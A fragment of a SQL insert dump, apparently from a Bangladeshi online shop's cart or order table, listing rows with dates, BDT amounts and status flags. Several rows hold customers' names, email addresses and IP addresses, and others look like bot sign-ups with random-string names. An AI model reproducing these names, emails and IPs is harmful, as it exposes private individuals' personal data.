(468, 1, '2025-04-07 09:34:28', '2025-04-07 09:34:28', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '95.217.18.161', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(469, 1, '2025-04-07 11:13:46', '2025-04-07 11:13:46', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '95.217.18.161', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(470, 1, '2025-05-04 17:34:33', '2025-05-04 17:34:33', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(471, 1, '2025-05-05 19:58:35', '2025-05-05 19:58:35', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 32.0000, 32.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '54.179.195.31', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 32.0000, 32.0000, 32.0000, 32.0000, 1, 0, NULL, NULL, 0),
(472, 1, '2025-05-23 12:20:11', '2025-05-23 12:20:11', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 112, NULL, 1, 'bjzqwamq@formtest.guru', NULL, 'Hello', NULL, 'TestUser', NULL, NULL, NULL, 1, 0, '196.251.85.111', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(473, 1, '2025-07-02 22:24:29', '2025-07-02 22:24:29', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 113, NULL, 1, 'mikesdrums@aol.com', NULL, 'Hannah', NULL, 'Shannon', NULL, NULL, NULL, 1, 0, '174.204.68.198', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(474, 1, '2025-07-04 22:01:03', '2025-07-04 22:01:03', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 114, NULL, 1, 'arleendoug12@gmail.com', NULL, 'Claudia', NULL, 'Semmens', NULL, NULL, NULL, 1, 0, '174.231.129.3', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(475, 1, '2025-08-19 11:44:46', '2025-08-19 11:44:46', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(476, 1, '2025-09-11 09:53:02', '2025-09-11 09:53:02', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(477, 1, '2025-09-28 13:47:42', '2025-09-28 13:47:42', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 111.0000, 111.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '115.164.209.179', '2', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 111.0000, 111.0000, 111.0000, 111.0000, 1, 0, NULL, NULL, 0),
(478, 1, '2025-09-28 15:40:49', '2025-09-28 15:40:49', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 336.8000, 336.8000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '104.224.74.124', '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 421.0000, 421.0000, 336.8000, 336.8000, 1, 0, NULL, NULL, 0),
(479, 1, '2025-10-01 21:55:53', '2025-10-01 21:55:53', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(480, 1, '2025-10-28 15:30:24', '2025-10-28 15:30:24', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(481, 1, '2025-10-28 15:30:38', '2025-10-28 15:30:38', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(482, 1, '2025-11-10 21:17:16', '2025-11-10 21:17:16', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(483, 1, '2025-11-10 21:17:24', '2025-11-10 21:17:24', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(484, 1, '2025-11-12 12:51:09', '2025-11-12 12:51:09', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(485, 1, '2025-11-12 12:51:19', '2025-11-12 12:51:19', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(486, 1, '2025-11-13 16:14:31', '2025-11-13 16:14:31', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '114.130.98.252', '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(487, 1, '2025-11-14 16:51:51', '2025-11-14 16:51:51', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(488, 1, '2025-11-14 16:52:04', '2025-11-14 16:52:04', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(489, 1, '2025-11-14 16:52:19', '2025-11-14 16:52:19', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(490, 1, '2025-11-14 16:52:29', '2025-11-14 16:52:29', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(491, 1, '2025-11-18 22:46:11', '2025-11-18 22:46:11', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(492, 1, '2025-12-01 00:45:09', '2025-12-01 00:45:09', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(493, 1, '2025-12-01 03:21:38', '2025-12-01 03:21:38', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(494, 1, '2025-12-02 17:01:59', '2025-12-02 17:01:59', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(495, 1, '2025-12-06 17:26:39', '2025-12-06 17:26:39', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(496, 1, '2025-12-06 17:26:47', '2025-12-06 17:26:47', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(497, 1, '2025-12-06 17:26:53', '2025-12-06 17:26:53', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(498, 1, '2025-12-06 17:26:59', '2025-12-06 17:26:59', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(499, 1, '2025-12-06 22:18:05', '2025-12-06 22:18:05', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(500, 1, '2025-12-06 22:18:42', '2025-12-06 22:18:42', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(501, 1, '2025-12-06 22:19:19', '2025-12-06 22:19:19', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(502, 1, '2025-12-06 22:19:55', '2025-12-06 22:19:55', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(503, 1, '2025-12-12 15:02:44', '2025-12-12 15:03:41', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 59.0000, 59.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '149.22.85.209', '2', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 54.0000, 54.0000, 54.0000, 54.0000, 1, 0, NULL, NULL, 0),
(504, 1, '2025-12-15 20:18:15', '2025-12-15 20:18:15', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(505, 1, '2025-12-15 20:18:16', '2025-12-15 20:18:16', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(506, 1, '2025-12-15 20:42:50', '2025-12-15 20:42:50', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(507, 1, '2025-12-15 20:42:51', '2025-12-15 20:42:51', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(508, 1, '2025-12-15 23:29:58', '2025-12-15 23:29:58', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(509, 1, '2025-12-17 08:18:08', '2025-12-17 08:18:08', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 111.0000, 111.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '103.137.73.182', '2', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 111.0000, 111.0000, 111.0000, 111.0000, 1, 0, NULL, NULL, 0),
(510, 1, '2025-12-18 00:56:10', '2025-12-18 00:56:10', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(511, 1, '2025-12-26 22:20:28', '2025-12-26 22:20:28', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 54.0000, 54.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '94.72.160.10', '2', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 54.0000, 54.0000, 54.0000, 54.0000, 1, 0, NULL, NULL, 0),
(513, 1, '2026-01-02 12:25:07', '2026-01-02 12:25:07', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 54.0000, 54.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '94.72.160.10', '2', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 54.0000, 54.0000, 54.0000, 54.0000, 1, 0, NULL, NULL, 0),
(514, 1, '2026-01-02 23:16:00', '2026-01-02 23:16:00', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 54.0000, 54.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '94.72.160.10', '2', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 54.0000, 54.0000, 54.0000, 54.0000, 1, 0, NULL, NULL, 0),
(515, 1, '2026-01-03 11:04:16', '2026-01-03 11:04:16', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 118, NULL, 1, 'xadeyaja181@gmail.com', NULL, 'fKGRargthWozcAOjSeKfV', NULL, 'UEJfcIwuKagcifpIVeeHmv', NULL, NULL, NULL, 1, 0, '185.220.101.9', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(516, 1, '2026-01-03 11:04:19', '2026-01-03 11:04:19', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(517, 1, '2026-01-07 23:06:36', '2026-01-07 23:06:36', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 119, NULL, 1, 'ib.ih.as.eq.aj.e.0.6.7@gmail.com', NULL, 'olBslTmTvzLSBlriS', NULL, 'YDEAhyKzJiDMuYpJlvC', NULL, NULL, NULL, 1, 0, '45.84.107.76', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(518, 1, '2026-01-08 10:42:37', '2026-01-08 10:42:37', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 120, NULL, 1, 'fi.yi.v.e.cu.65@gmail.com', NULL, 'ldyvCRwlkiLHsmoBvmJiVad', NULL, 'sawyRPVcvQnWkmaAHmIrq', NULL, NULL, NULL, 1, 0, '185.220.101.27', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(519, 1, '2026-01-11 16:07:10', '2026-01-11 16:07:10', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 121, NULL, 1, 'iqe.c.i.ya.li.k.o80.6@gmail.com', NULL, 'JvWiOsMSgIoWVjPVWUT', NULL, 'EKaNuPAyZMkYjVArrjouUytd', NULL, NULL, NULL, 1, 0, '171.25.193.131', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(520, 1, '2026-01-13 15:18:25', '2026-01-13 15:18:25', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 122, NULL, 1, 'op.oy.im.o.baxe.h86@gmail.com', NULL, 'wGfDUvkPqSfxRHrcSSDgeIM', NULL, 'nsUudcodvszhlvjrmOIm', NULL, NULL, NULL, 1, 0, '185.220.101.152', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(521, 1, '2026-01-13 20:10:29', '2026-01-13 20:10:29', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 256.8000, 256.8000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '37.111.207.166', '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 321.0000, 321.0000, 256.8000, 256.8000, 1, 0, NULL, NULL, 0),
(522, 1, '2026-01-18 02:14:23', '2026-01-18 02:14:23', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(523, 1, '2026-01-21 21:30:23', '2026-01-21 21:30:23', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 32.0000, 32.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '72.234.16.74', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 32.0000, 32.0000, 32.0000, 32.0000, 1, 0, NULL, NULL, 0),
(524, 1, '2026-01-21 21:36:14', '2026-01-21 21:36:14', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 514.4000, 514.4000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '66.249.64.128', '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 643.0000, 643.0000, 514.4000, 514.4000, 1, 0, NULL, NULL, 0),
(525, 1, '2026-01-21 22:35:36', '2026-01-21 22:35:36', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 111.0000, 111.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '66.249.64.128', '2', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 111.0000, 111.0000, 111.0000, 111.0000, 1, 0, NULL, NULL, 0),
(526, 1, '2026-01-24 20:20:36', '2026-01-24 20:20:36', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(527, 1, '2026-01-24 20:35:09', '2026-01-24 20:35:09', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(528, 1, '2026-01-27 09:33:47', '2026-01-27 09:33:47', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
